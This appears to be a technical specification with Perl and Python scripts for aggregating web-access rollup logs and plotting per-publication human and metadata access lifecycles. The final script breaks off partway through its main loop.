The legend MUST be present.
The legend MUST NOT obscure plotted envelopes.
The legend SHOULD be placed in an area of minimal signal density (commonly the lead-in region x < 0) or a corner that does not overlap.

LG-31: Axis and annotation requirements

X-axis label MUST state UTC/Zulu explicitly.
The x=0 publication reference MUST be drawn as a vertical line.
Major x ticks SHOULD be integers or stable intervals appropriate to the window (e.g., 10 days).
Minor x ticks SHOULD be deterministic (e.g., 5 days).
Random jitter is prohibited.

LG-36: Day major graticles and minor ticks

Major graticles MUST be drawn at every major tick.
Minor graticles MUST NOT be drawn at every minor tick.

Label Content

LG-32: Row label format (mandatory)

Each Y-axis label MUST be exactly:

 "<title> (<publication_datetime_utc>) (h:<H_TOTAL>, m:<M_TOTAL>)"

publication_datetime_utc MUST be rendered as an ISO-8601 UTC string in compact Zulu form:
- YYYY-MM-DDTHH:MMZ
- seconds MUST be omitted
- "+00:00" MUST NOT be used in place of "Z"
h and m totals MUST correspond to LG-17 totals (pre-amplification).

LG-38: Label margin sizing (mandatory; minimal sufficient)

The left margin MUST be sized to be just sufficient for the widest Y-axis label, with no excessive white space.
The implementation MUST compute text extents (or an equivalent deterministic measurement) and set the plotting left margin accordingly.
Labels MUST NOT be clipped.

Validation and Verification (MANDATORY)

LG-33: Pre-render validation (data integrity)

A compliant implementation MUST validate:

All included titles exist in MANIFEST and have valid UTC publication datetime.
No excluded/unpublished titles are included.
Title normalisation resolves to manifest keys only (no unresolved titles).
HUMAN and META day series cover the full rollup day span with zeros filled (LG-16).

LG-34: Post-render verification (image integrity)

A compliant implementation MUST verify the rendered output satisfies:

Fill opacity is opaque (no transparency washout).
Row order is visually publication-ascending top-to-bottom.
Envelopes do not touch adjacent rows (LG-29).
Category baseline graticles are present for all rows (LG-23).
Major graticles are present at every major tick (LG-36).
Minor graticles are not drawn. (LG-36).
Legend is present and does not obscure envelopes.
X-axis includes at least LEAD_MIN_DAYS lead-in (LG-20).
x=0 reference line is present.
Label timestamps are compact Zulu (…THH:MMZ), not “…00:00:00+00:00”.

If any verification fails, the projection MUST be rejected and regenerated.

Forbidden Behaviours

Inferring publication dates from traffic.
Local timezone conversions.
Fuzzy matching titles to manifest.
Merging meta hits into page hits.
Silent scaling changes between runs without explicit declaration.
Transparent fills.
Overlapping rows.
Excessive left label margin beyond what is required to avoid clipping.

C2-ROLLUPS-Bucket-Native (Revision)

The lifecycle graphlets SHALL be derived directly from rollup bucket files. No intermediate UTC calendar day aggregation is permitted.

C2.1 Authoritative Inputs

C2-ROLL-0 (Bucket Time Derivation): Rollup bucket start and end times SHALL be parsed exclusively from the filename (UTC “Z”).; No alternate timestamp source is permitted.

C2-ROLL-1 (Bucket Duration Consistency): All rollups included in a projection SHALL have identical bucket duration (BUCKET_SECONDS).; Mixed bucket durations SHALL cause hard failure.

C2-MAN-0 (Publication Time Authority): Publication datetimes SHALL be sourced exclusively from manifest.tsv.; All publication times SHALL be treated as UTC.

C2-MAN-1 (Eligibility): Only titles present in the manifest with valid publication datetime SHALL be eligible.

C2.2 Path and Title Normalisation

C2-NORM-0 (Title Normalisation): Titles extracted from rollups SHALL be normalised via the governed rename map.

C2-PATH-0 (Signal Classification): Page paths (e.g. /pub/<Title>) define HUMAN signal.; Meta paths (e.g. /pub-meta/, *-meta/) define META signal.; Querystrings SHALL be stripped before classification.

C2.3 Signal Semantics

Let H[bucket, title] be page-only human_get_ok.

Let M[bucket, title] be metadata_get_ok over meta paths only.

C2-SIG-0 (Human Definition): Human signal SHALL be page-only human_get_ok.

C2-SIG-1 (Metadata Definition — metadata actor only): Meta signal SHALL be metadata_get_ok on meta paths only.; No other actor buckets SHALL contribute.

C2-POL-0 (Polarity): Human SHALL render above baseline (Y+).; Meta SHALL render below baseline (Y−).

C2-COL-0 (Colour): Human SHALL render in blue.; Meta SHALL render in orange.; No palette substitution permitted.

C2.4 Timebase and Relative Axis

C2-TIME-0 (Publication Anchor Bucket)

For each title T:

PUB_BUCKET_DT[T] = floor(PUB_DT[T] / BUCKET_SECONDS) × BUCKET_SECONDS

C2-TIME-1 (Relative Bucket Offset): REL_BUCKET[T, B] = (B − PUB_BUCKET_DT[T]) / BUCKET_SECONDS

C2-TIME-2 (Relative Days): X_DAYS = REL_BUCKET × (BUCKET_SECONDS / 86400); The X-axis SHALL represent real-valued days relative to publication.

C2-TIME-3 (Lead Window)

A fixed pre-publication window SHALL be enforced:

min_day = −LEAD_DAYS (default 10).

C2-TIME-4 (Right Extent): max_day SHALL be derived from the latest available rollup bucket.

C2.5 Moving Average and Compression

C2-MA-0 (MA Parameterisation)

MA window SHALL be configurable via CLI parameter:

--ma-days <float>

Default SHALL be 7.

C2-MA-1 (Bucket-Domain Smoothing): Smoothing SHALL be performed in bucket domain.; MA_BUCKETS = round(MA_DAYS × 86400 / BUCKET_SECONDS); If MA_BUCKETS < 1 → set to 1.; If centered smoothing → MA_BUCKETS SHALL be odd.

C2-MA-2 (Boundary Policy): Boundary handling SHALL be deterministic and declared.; (Current implementation: zero padding.)

C2-LOG-0 (Log Compression)

After smoothing:

Human = ln(1 + H_AMP × MA(H))
Meta = ln(1 + MA(M))

C2.6 Rendering and Layout

C2-Y-0 (Row Ordering): Rows SHALL be ordered by publication datetime ascending.

C2-Y-1 (Row Label Format): "<Title> (<publication_datetime_UTC>) (h:<total_h>, m:<total_m>)"

C2-ROW-0 (Non-Overlap Constraint): ROW_SPACING, ROW_MAX, ROW_MARGIN SHALL enforce non-overlap.; Violation SHALL hard-fail.

C2-VLINE-0 (Publication Marker): A vertical reference line SHALL be drawn at x = 0.

C2.7 Tick and Grid Invariants

C2-TICK-0 (Tick Anchoring): All tick positions SHALL be exact multiples of step size and SHALL be anchored at x = 0.; tick = k × step where k ∈ ℤ.

C2-TICK-1 (Step Relationship): major_step % minor_step SHALL equal 0.

C2-TICK-2 (Labelling): Only major ticks SHALL be labelled.; Minor tick labels SHALL be suppressed.

C2-TICK-3 (Grid Policy): Major grid MAY be enabled.; Minor grid SHOULD be disabled.

C2.8 Determinism

C2-DET-0 (Reproducibility): Given identical manifest, rollups, and parameters, the projection SHALL be reproducible.

C2-DET-1 (No Inference): The projection SHALL NOT infer missing publication dates, missing titles, or modify source data.

End of invariants

Appendix D - page list verify

TO DO: This needs to be revised (or rewmoved)

page_list_verify is used to accumulate page counts over the supplied rollups input period.

MWDUMP: Appendix D — Page List Verification Normatives Scope: page_list_verify (rollup aggregation → publication-level summaries)

D-1. Input Trust Boundary page_list_verify SHALL treat rollup TSVs as authoritative inputs and SHALL NOT reclassify actor types or access modes.

D-2. Canonical Title Authority The authoritative set of corpus titles SHALL be derived from:

a) the corpus manifest, and

b) explicitly uploaded project publications

No heuristic discovery of additional titles is permitted.

D-3. Page-Only Aggregation (MANDATORY) All ordering, ranking, and primary aggregation SHALL be performed using:

page-only human_get_ok

Meta access SHALL NOT influence ordering or ranking.

D-4. Meta Access as Diagnostic Signal Meta access MAY be displayed and reported, but SHALL be treated as a diagnostic signal, not as readership.

D-5. Title Normalisation Title normalisation SHALL:

replace underscores with spaces
collapse whitespace
normalise dash variants
preserve semantic identity

Normalisation MUST NOT alter namespace semantics.

D-6. Meta Namespace Integrity Meta access paths (e.g. <root>-meta/…) SHALL NOT be interpreted as page titles. Meta namespace elements SHALL be stripped before title comparison.

D-7. Category Separation Aggregations SHALL preserve separation between:

human
AI bot
bot
badbot

No category may be collapsed into another for convenience.

D-8. Zero-Activity Preservation Corpus titles with zero activity in the aggregation window SHALL still be included in outputs when completeness is required.

D-9. Sorting Semantics When sorting by readership, only page-only human_get_ok SHALL be used. Any other sorting key MUST be explicitly declared.

D-10. Presentation Transparency When displaying per-title summaries, any displayed composite values MUST be explicitly labelled (e.g. page vs meta).

Implicit summation is prohibited.

page_list_verify code

cat page_list_verify 

#!/usr/bin/env perl
use strict;
use warnings;
use Getopt::Long qw(GetOptions);
use Archive::Tar;
use URI::Escape qw(uri_unescape);
use File::Spec;

# ============================================================================
# page_list_verify
#
# Manifest-agnostic rollup verifier.
#
# Aggregation key (resource name):
#   1) If MediaWiki title extractable:
#        - normalise per paper rules
#        - use TITLE
#   2) Else:
#        - take LAST PATH COMPONENT (basename)
#        - use as resource name
#
# Output:
#   resource_name <tab> human_get_ok <tab> <all other numeric columns...>
#
# Sorted by: human_get_ok DESC, then resource_name ASC
# ============================================================================

my $ROLLUPS = "";
my $SERVER  = "";       # optional vhost filter
my $X       = "pub";
my $XDIR    = "pub-dir";
my $MDIR    = "pub-meta";
my $HELP    = 0;

GetOptions(
  "rollups=s" => \$ROLLUPS,
  "server=s"  => \$SERVER,
  "x=s"       => \$X,
  "xdir=s"    => \$XDIR,
  "mdir=s"    => \$MDIR,
  "help!"     => \$HELP,
) or die "bad options\n";

if ($HELP || !$ROLLUPS) {
  print <<"USAGE";
Usage:
  $0 --rollups rollups.tgz [--server publications.arising.com.au]
  $0 --rollups /path/to/tsv_dir [--server publications.arising.com.au]

Behavior:
  - Aggregates by resource name
  - Orders by human_get_ok descending
USAGE
  exit 0;
}

my %SUM;
my @PRINT_NUM_COLS;
my $COLS_INIT = 0;

sub looks_numeric {
  my ($v) = @_;
  return defined($v) && $v =~ /^\d+$/;
}

sub normalise_title {
  my ($t) = @_;
  $t = uri_unescape($t // "");
  $t =~ s/_/ /g;
  $t =~ s/[\x{2013}\x{2014}]/-/g;   # – —
  $t =~ s/\s+/ /g;
  $t =~ s/^\s+|\s+$//g;
  return $t;
}

sub last_path_component {
  my ($p) = @_;
  $p //= "";
  $p =~ s/#.*$//;
  $p =~ s/\?.*$//;
  $p =~ s{.*/}{};
  return uri_unescape($p);
}

sub split_path_query {
  my ($raw) = @_;
  $raw //= "";
  my $p = uri_unescape($raw);

  # drop fragment
  $p =~ s/#.*$//;

  # split base and query (no further decoding yet; uri_unescape already done)
  my ($base, $qs) = split(/\?/, $p, 2);
  $qs //= "";

  return ($base, $qs);
}

sub parse_qs {
  my ($qs) = @_;
  my %q;
  return %q if !defined($qs) || $qs eq "";

  for my $pair (split /&/, $qs) {
    next if $pair eq "";
    my ($k, $v) = split /=/, $pair, 2;
    $k //= "";
    $v //= "";
    $k = uri_unescape($k);
    $v = uri_unescape($v);
    $q{lc $k} = $v if $k ne "";
  }
  return %q;
}

sub is_special_target_carrier {
  my ($title) = @_;
  return 0 unless defined $title && $title ne "";

  # Case-insensitive exact match on these Special pages
  my %SPECIAL = map { lc($_) => 1 } qw(
    Special:WhatLinksHere
    Special:RecentChangesLinked
    Special:LinkSearch
    Special:PageInformation
    Special:CiteThisPage
    Special:PermanentLink
  );

  return $SPECIAL{lc $title} ? 1 : 0;
}

sub extract_title_candidate {
  my ($raw) = @_;
  return undef unless defined $raw && $raw ne "";

  my ($base, $qs) = split_path_query($raw);
  my %q = parse_qs($qs);

  # Carrier 1 — Direct page path: /<x>/<title>
  if ($base =~ m{^/\Q$X\E/(.+)$}) {
    my $t = $1;

    # Carrier 3 — Special-page target title (when Special page is accessed via /<x>/Special:...)
    if (is_special_target_carrier($t)) {
      return $q{target}   if defined $q{target}   && $q{target}   ne "";
      return $q{page}     if defined $q{page}     && $q{page}     ne "";
      return $q{title}    if defined $q{title}    && $q{title}    ne "";
      # return $q{returnto} if defined $q{returnto} && $q{returnto} ne ""; # this is caused by a user or a robot trying to access a non-public page
      return $t;  # attribute to the Special page itself
    }

    return $t;
  }

  # Carrier 1b — Paired root folding: /<xdir>/<title>
  if ($base =~ m{^/\Q$XDIR\E/(.+)$}) {
    return $1;
  }

  # Carrier 2 — Canonical index form: /<xdir>/index.php?<query>
  if ($base =~ m{^/\Q$XDIR\E/index\.php$}i) {

    # If title= points at a Special page, handle Special target extraction
    if (defined $q{title} && $q{title} ne "" && is_special_target_carrier($q{title})) {
      return $q{target}   if defined $q{target}   && $q{target}   ne "";
      return $q{page}     if defined $q{page}     && $q{page}     ne "";
      return $q{title}    if defined $q{title}    && $q{title}    ne "";
      # return $q{returnto} if defined $q{returnto} && $q{returnto} ne ""; # access to a non public page
      return $q{title};   # attribute to the Special page itself
    }

    # Normal index.php handling
    return $q{title}    if defined $q{title}    && $q{title}    ne "";
    return $q{page}     if defined $q{page}     && $q{page}     ne "";
    return $q{returnto} if defined $q{returnto} && $q{returnto} ne "";
  }

  # Generic request-parameter title carrier (permissive)
  return $q{title}  if defined $q{title}  && $q{title}  ne "";
  return $q{page}   if defined $q{page}   && $q{page}   ne "";
  return $q{target} if defined $q{target} && $q{target} ne "";

  if ($base =~ m{^/\Q$MDIR\E/(.+)$}) {
     return ".$1"; 
  }

  return undef;
}

sub init_columns {
  my (@cols) = @_;
  my @num = grep { $_ ne "server_name" && $_ ne "path" } @cols;

  if (grep { $_ eq "human_get_ok" } @num) {
    @PRINT_NUM_COLS = ("human_get_ok", grep { $_ ne "human_get_ok" } @num);
  } else {
    warn "WARNING: human_get_ok column missing\n";
    @PRINT_NUM_COLS = @num;
  }
  $COLS_INIT = 1;
}

sub parse_stream {
  my ($fh, $src) = @_;

  my $header = <$fh> // return;
  chomp $header;
  my @cols = split /\t/, $header, -1;
  my %ix;
  $ix{$cols[$_]} = $_ for 0 .. $#cols;

  die "$src: missing server_name\n" unless exists $ix{server_name};
  die "$src: missing path\n"        unless exists $ix{path};

  init_columns(@cols) unless $COLS_INIT;

  while (<$fh>) {
    chomp;
    next if $_ eq "";
    my @f = split /\t/, $_, -1;

    my $srv = $f[$ix{server_name}] // "";
    next if $SERVER ne "" && $srv ne $SERVER;

    my $path = $f[$ix{path}] // "";

    my $key;
    if (my $cand = extract_title_candidate($path)) {
      my $t = normalise_title($cand);
      $key = $t ne "" ? $t : last_path_component($path);
    } else {
      $key = last_path_component($path);
    }

    for my $c (@PRINT_NUM_COLS) {
      my $i = $ix{$c};
      my $v = defined $i ? ($f[$i] // 0) : 0;
      $v = 0 unless looks_numeric($v);
      $SUM{$key}{$c} += $v;
    }
  }
}

sub process_dir {
  my ($d) = @_;
  opendir my $dh, $d or die "cannot open $d\n";
  for my $f (sort grep { /\.tsv$/ } readdir $dh) {
    open my $fh, "<", File::Spec->catfile($d,$f) or die;
    parse_stream($fh, "$d/$f");
    close $fh;
  }
  closedir $dh;
}

sub process_tgz {
  my ($tgz) = @_;
  my $tar = Archive::Tar->new;
  $tar->read($tgz,1) or die "cannot read $tgz\n";
  for my $n (sort $tar->list_files) {
    next unless $n =~ /\.tsv$/;
    open my $fh, "<", \$tar->get_content($n) or die;
    parse_stream($fh, "$tgz:$n");
    close $fh;
  }
}

if (-d $ROLLUPS) {
  process_dir($ROLLUPS);
} else {
  process_tgz($ROLLUPS);
}

# Output
print join("\t", "resource", @PRINT_NUM_COLS), "\n";

for my $k (
  sort {
    ($SUM{$b}{human_get_ok} // 0) <=> ($SUM{$a}{human_get_ok} // 0)
    || $a cmp $b
  } keys %SUM
) {
  print join("\t", $k, map { $SUM{$k}{$_} // 0 } @PRINT_NUM_COLS), "\n";
}

Appendix E - MiB graph

I got tired of the model ignoring invariants, The following code may be used to display MiB per rollup file (one hour summary).

#!/usr/bin/env python3
"""
Generate MiB/hour time series and graph from rollups only.

Assumptions (matches your rollup format):
- Each rollup file is a 1-hour bucket TSV.
- Filename contains bucket window like:
    YYYY_MM_DDThh_mmZ-to-YYYY_MM_DDThh_mmZ.tsv
- Each TSV row has a 'total_bytes' column (bytes for that path in that bucket).
- To get total bucket traffic, we SUM total_bytes across all rows in the file.

Outputs:
- time_series_mib_hourly_from_rollups.tsv
- mib_hourly_log_ma3_1000px.png
"""

import argparse
import csv
import os
import re
from datetime import datetime, timezone
from typing import Optional, Tuple, List, Dict

import pandas as pd
import matplotlib.pyplot as plt


FILENAME_RE = re.compile(
    r"^(?P<y1>\d{4})_(?P<m1>\d{2})_(?P<d1>\d{2})T(?P<h1>\d{2})_(?P<min1>\d{2})Z"
    r"-to-"
    r"(?P<y2>\d{4})_(?P<m2>\d{2})_(?P<d2>\d{2})T(?P<h2>\d{2})_(?P<min2>\d{2})Z"
    r"\.tsv$"
)


def parse_bucket_from_filename(fn: str) -> Tuple[datetime, datetime]:
    m = FILENAME_RE.match(fn)
    if not m:
        raise ValueError(f"Unparseable rollup filename: {fn}")
    g = m.groupdict()
    start = datetime(int(g["y1"]), int(g["m1"]), int(g["d1"]), int(g["h1"]), int(g["min1"]), tzinfo=timezone.utc)
    end   = datetime(int(g["y2"]), int(g["m2"]), int(g["d2"]), int(g["h2"]), int(g["min2"]), tzinfo=timezone.utc)
    return start, end


def read_bucket_total_bytes(path: str, server_filter: Optional[str] = None) -> Tuple[int, Optional[str]]:
    """
    Returns (sum_total_bytes, inferred_server_name_or_None).

    If server_filter is set and 'server_name' column exists, only rows matching are counted.
    """
    total = 0
    inferred_server = None

    with open(path, "r", newline="") as f:
        reader = csv.reader(f, delimiter="\t")
        header = next(reader)

        col = {name: i for i, name in enumerate(header)}
        if "total_bytes" not in col:
            raise RuntimeError(f"Missing 'total_bytes' column in {path}")

        idx_total_bytes = col["total_bytes"]
        idx_server = col.get("server_name", None)

        for row in reader:
            if not row:
                continue

            if idx_server is not None and len(row) > idx_server:
                sname = row[idx_server]
                if inferred_server is None and sname:
                    inferred_server = sname

                if server_filter is not None and sname != server_filter:
                    continue
            elif server_filter is not None:
                # asked to filter but file has no server_name col
                continue

            try:
                total += int(row[idx_total_bytes])
            except Exception:
                # treat malformed as zero
                pass

    return total, inferred_server


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--rollups_dir", default="rollups", help="Directory containing hourly rollup TSVs")
    ap.add_argument("--server", default=None, help="Optional server_name filter (exact match)")
    ap.add_argument("--out_tsv", default="time_series_mib_hourly_from_rollups.tsv", help="Output TSV")
    ap.add_argument("--out_png", default="mib_hourly_log_ma3_1000px.png", help="Output PNG graph")
    ap.add_argument("--dpi", type=int, default=100, help="DPI (default: 100)")
    ap.add_argument("--width_px", type=int, default=1000, help="Output width in pixels (default: 1000)")
    ap.add_argument("--height_px", type=int, default=500, help="Output height in pixels (default: 500)")
    args = ap.parse_args()

    files = sorted([f for f in os.listdir(args.rollups_dir) if f.endswith(".tsv")])

    rows: List[Dict] = []
    inferred_server_global = None

    for fn in files:
        try:
            start, end = parse_bucket_from_filename(fn)
        except ValueError:
            # skip non-rollup TSVs that don't match the bucket naming convention
            continue

        fp = os.path.join(args.rollups_dir, fn)
        total_bytes, inferred_server = read_bucket_total_bytes(fp, server_filter=args.server)

        if inferred_server_global is None and inferred_server:
            inferred_server_global = inferred_server

        bucket_seconds = int((end - start).total_seconds())
        mib = total_bytes / (1024.0 * 1024.0)
        mib_per_second = mib / bucket_seconds if bucket_seconds > 0 else 0.0

        rows.append(
            {
                "server_name": args.server if args.server else (inferred_server or inferred_server_global or ""),
                "bucket_start": start.isoformat().replace("+00:00", "Z"),
                "bucket_end": end.isoformat().replace("+00:00", "Z"),
                "bucket_seconds": bucket_seconds,
                "total_bytes": total_bytes,
                "MiB": mib,
                "MiB_per_second": mib_per_second,
            }
        )

    if not rows:
        raise SystemExit("No rollup TSVs matched the expected filename pattern in rollups_dir.")

    df = pd.DataFrame(rows)
    df["bucket_start"] = pd.to_datetime(df["bucket_start"], utc=True)
    df = df.sort_values("bucket_start").reset_index(drop=True)

    # MA(3) across hourly buckets; first 2 points undefined
    df["MA3_MiB"] = df["MiB"].astype(float).rolling(window=3, min_periods=3).mean()

    # Write derived series TSV (audit)
    out_df = df.copy()
    out_df["bucket_start"] = out_df["bucket_start"].dt.strftime("%Y-%m-%dT%H:%M:%SZ")
    out_df.to_csv(args.out_tsv, sep="\t", index=False)

    # Plot at requested pixel size
    fig_w_in = args.width_px / args.dpi
    fig_h_in = args.height_px / args.dpi
    plt.figure(figsize=(fig_w_in, fig_h_in), dpi=args.dpi)

    plt.plot(df["bucket_start"], df["MiB"], label="MiB/hour")
    plt.plot(df["bucket_start"], df["MA3_MiB"], label="MA(3) MiB/hour")

    # Log paper + graticules
    plt.yscale("log")
    plt.grid(True, which="major")
    plt.grid(True, which="minor")

    # X ticks every 7 days, oblique
    start = df["bucket_start"].min().normalize()
    end = df["bucket_start"].max().normalize()
    tick_locs = pd.date_range(start=start, end=end, freq="7D", tz="UTC")
    plt.xticks(tick_locs, rotation=45, ha="right")

    plt.xlabel("Date (UTC)")
    plt.ylabel("MiB per Hourly Bucket (log scale)")
    title = "Hourly Traffic (MiB/hour) with MA(3) Overlay"
    if args.server:
        title += f" — server={args.server}"
    plt.title(title)
    plt.legend()
    plt.tight_layout()

    plt.savefig(args.out_png)
    print(f"Wrote: {args.out_tsv}")
    print(f"Wrote: {args.out_png}")


if __name__ == "__main__":
    main()

Appendix F - Access Lifecycle Graphlets

access.py (code)

Human get_200_304 vs Anon/Metadata access (unattributed agents/bot-nets) Replacement access.py code working with aggregation via bucketsize and Moving Average in days.

#!/usr/bin/env python3

# History;
# 2026-03-09 Ralph - visual dissonance of the last few publications indicated a mistake in the metadata count - fixed it
# 2026-03-02 Ralph - conveted to use aggregations based on bin-size and Moving Average based on days across a set of bins
# 2026-02-28 Ralph = converted it to display log10(1 + bytes/second)

import os, re, math, csv
from datetime import datetime, timezone, timedelta
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.patches import Patch
import argparse

# Paths (already extracted)
manifest_path = "corpus/manifest.tsv"
rollups_dir = "rollups"

out_png = "lifecycle.png"
out_svg = "svg-ifecycle.svg"
out_tsv = "tsv-lifecycle.tsv"  # bucket-binned

ap = argparse.ArgumentParser()
ap.add_argument(
    "--ma-days",
    type=float,
    default=7.0,
    help="Moving average window in days (default=3)"
)
ap.add_argument(
    "--h-amp",
    type=float,
    default=40.0,
    help="Human Amplification factor (default=35.0)"
)
args = ap.parse_args()

MA_DAYS = float(args.ma_days)
H_AMP = float(args.h_amp)

# MA_DAYS = 3.0  # Moving-average window in days (default = 1 day)/MA

# ---------------------------------------------------------------------
# CURATOR RENAME MAP (FULL)
# ---------------------------------------------------------------------

RENAME_MAP = {

    # -------------------------------------------------------------
    # First Self-Hosting Epistemic Capture
    # -------------------------------------------------------------
    "Cognitive Memoisation (CM-2): A Human-Governed Protocol for Knowledge Governance and Transport in AI Systems)":
        "First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2)",

    # -------------------------------------------------------------
    # CM-2 Governing Knowledge
    # -------------------------------------------------------------
    "Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration":
        "Cognitive Memoisation (CM-2) Protocol",

    "Let's Build a Ship - Cognitive Memoisation for Governing Knowledge in Human - AI Collabortion":
        "Cognitive Memoisation (CM-2) Protocol",

    # -------------------------------------------------------------
    # Corpus Map
    # -------------------------------------------------------------
    "Cognitive Memoisation: corpus guide":
        "Cognitive Memoisation Corpus Map",

    # -------------------------------------------------------------
    # Plain Language Summary typo
    "Cognitive Memoisation and LLMs: A Method for Exploratory Modelling Before Formalisation'":
        "Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration",

    
    # -------------------------------------------------------------
    # Missing '?' fix
    # -------------------------------------------------------------
    "What Can Humans Trust LLM AI to Do":
        "What Can Humans Trust LLM AI to Do?",

    "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering":
	"Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering (2026-12-30)",
}


# Required settings per user
LEAD_DAYS = 10
ROW_SPACING = 1.0
ROW_MAX = 0.45
ROW_MARGIN = 0.05

# Explicit publication colours (user requested)
H_COLOR = "#1f77b4"   # blue
M_COLOR = "#F28C28"   # strong orange
BASELINE_COLOR = "#000000"

def parse_zulu(s: str) -> datetime:
    s = str(s).strip()
    if s.endswith("Z"):
        s2 = s[:-1]
        fmt = "%Y-%m-%dT%H:%M"
        if re.match(r".*:\d\d:\d\d$", s2):
            fmt = "%Y-%m-%dT%H:%M:%S"
        return datetime.strptime(s2, fmt).replace(tzinfo=timezone.utc)
    dt = datetime.fromisoformat(s)
    # Enforce UTC if tz is absent (localtime is not permitted here).
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)

def compact_zulu(dt: datetime) -> str:
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%MZ")

def norm_title(s: str) -> str:

    s = str(s).replace("_", " ")
    s = re.sub(r"\s+", " ", s).strip()
    s = s.replace("–", "-").replace("—", "-").replace("−", "-")

    conv =  RENAME_MAP.get(s, s)
    if (conv):
        return conv

    return s

from urllib.parse import unquote
def bucket_window_from_filename(fn: str) -> tuple[datetime, datetime, int]:
    """Return (bucket_start_utc, bucket_end_utc, bucket_seconds) parsed from rollup filename."""
    m = re.match(
        r"^(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z-to-"
        r"(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z\.tsv$",
        fn,
    )
    if not m:
        raise ValueError(f"Unparseable rollup filename: {fn}")
    y1, mo1, d1, hh1, mm1, y2, mo2, d2, hh2, mm2 = map(int, m.groups())
    bstart = datetime(y1, mo1, d1, hh1, mm1, tzinfo=timezone.utc)
    bend   = datetime(y2, mo2, d2, hh2, mm2, tzinfo=timezone.utc)
    secs = int((bend - bstart).total_seconds())
    if secs <= 0:
        raise ValueError(f"Non-positive bucket window in filename: {fn}")
    return bstart, bend, secs

def bucket_start_from_filename(fn: str) -> datetime:
    # Back-compat helper: keep older call sites readable.
    return bucket_window_from_filename(fn)[0]



def classify_path_to_title(path: str):
    p = str(path).split("?", 1)[0]
    p = unquote(p)

    if "-meta/" in p:
        kind = "meta"
        if "/pub-meta/" in p:
            rest = p.split("/pub-meta/", 1)[1]
            parts = rest.split("/", 2)
            if len(parts) >= 2:
                title = parts[1]
            else:
                return (None, None)
        else:
            rest = p.split("-meta/", 1)[1]
            parts = rest.split("/", 1)
            title = parts[1] if len(parts) == 2 else parts[0]
        return (kind, norm_title(title))

    if p.startswith("/pub/"):
        title = p[len("/pub/"):]
        return ("page", norm_title(title))

    return (None, None)

# ---- Load manifest ----
man = pd.read_csv(manifest_path, sep="\t", header=None, names=["title","safe_file","pub_date"])
norm_map = {}
pub_dt = {}
for _, r in man.iterrows():
    t = str(r["title"])
    nt = norm_title(t)
    norm_map.setdefault(nt, t)
    try:
        pub_dt[t] = parse_zulu(r["pub_date"])
    except Exception:
        pass

eligible_titles = [t for t in man["title"].tolist() if t in pub_dt]

# ---- Scan rollups and aggregate daily counts ----
rollup_files = sorted([f for f in os.listdir(rollups_dir) if f.endswith(".tsv")])
first_file = os.path.join(rollups_dir, rollup_files[0])
with open(first_file, "r", newline="") as f:
    reader = csv.reader(f, delimiter="\t")
    header = next(reader)
col_index = {c:i for i,c in enumerate(header)}

path_idx = col_index["path"]
human_get_ok_idx = col_index["human_get_ok"]

# Metadata series must come ONLY from the unattributed metadata actor bucket.
# Include all metadata_* columns so throttled / blocked metadata pressure is retained.
meta_cols = [c for c in header if c.startswith("metadata_")]
if not meta_cols:
    raise RuntimeError("No metadata_* columns found in rollup header")
meta_idx = [col_index[c] for c in meta_cols]

H = {}
M = {}

BUCKET_SECONDS = None

min_bucket = None
max_bucket = None

for fn in rollup_files:
    bstart, bend, bsecs = bucket_window_from_filename(fn)
    if BUCKET_SECONDS is None:
        BUCKET_SECONDS = bsecs
    elif BUCKET_SECONDS != bsecs:
        raise ValueError(f"Inconsistent bucket sizes: saw {BUCKET_SECONDS}s then {bsecs}s in {fn}")
    min_bucket = bstart if min_bucket is None else min(min_bucket, bstart)
    max_bucket = bstart if max_bucket is None else max(max_bucket, bstart)

    fp = os.path.join(rollups_dir, fn)
    with open(fp, "r", newline="") as f:
        reader = csv.reader(f, delimiter="\t")
        _ = next(reader)
        for row in reader:
            if not row or len(row) <= path_idx:
                continue
            kind, nt = classify_path_to_title(row[path_idx])
            if kind is None or nt is None:
                continue
            if nt not in norm_map:
                continue
            title = norm_map[nt]
            if title not in pub_dt:
                continue

            if kind == "page":
                try:
                    v = int(row[human_get_ok_idx])
                except Exception:
                    v = 0
                if v:
                    H[(bstart, title)] = H.get((bstart, title), 0) + v
            else:
                s = 0
                for idx in meta_idx:
                    try:
                        s += int(row[idx])
                    except Exception:
                        pass
                if s:
                    M[(bstart, title)] = M.get((bstart, title), 0) + s


MA_BUCKETS = int(round((MA_DAYS * 86400.0) / float(BUCKET_SECONDS)))

if MA_BUCKETS < 1:
    MA_BUCKETS = 1
if MA_BUCKETS % 2 == 0:
    MA_BUCKETS += 1  # force odd for centered MA


# Full bucket list (UTC)
if BUCKET_SECONDS is None or min_bucket is None or max_bucket is None:
    raise RuntimeError("No rollup buckets found")

bucket_list = []
dt = min_bucket
while dt <= max_bucket:
    bucket_list.append(dt)
    dt += timedelta(seconds=BUCKET_SECONDS)

# Relative bucket range (bucket index relative to publication bucket)
LEAD_BUCKETS = int((LEAD_DAYS * 86400) // BUCKET_SECONDS)
min_rel = -LEAD_BUCKETS

# Compute max_rel in buckets based on latest observed rollup bucket.
max_rel = max([
    int(((max_bucket - datetime.fromtimestamp((int(pub_dt[t].timestamp()) // BUCKET_SECONDS) * BUCKET_SECONDS, tz=timezone.utc)).total_seconds()) // BUCKET_SECONDS)
    for t in eligible_titles
])
rel_range = np.arange(min_rel, max_rel + 1, dtype=int)
x_days = rel_range.astype(float) * BUCKET_SECONDS / 86400.0 

# Build series
H_series = {}
M_series = {}
for t in eligible_titles:
    pdt = pub_dt[t]
    arr_h = np.zeros(len(rel_range), dtype=float)
    arr_m = np.zeros(len(rel_range), dtype=float)
    pub_epoch = int(pdt.timestamp())
    pub_bucket_epoch = (pub_epoch // BUCKET_SECONDS) * BUCKET_SECONDS
    pub_bucket_dt = datetime.fromtimestamp(pub_bucket_epoch, tz=timezone.utc)

    for bdt in bucket_list:
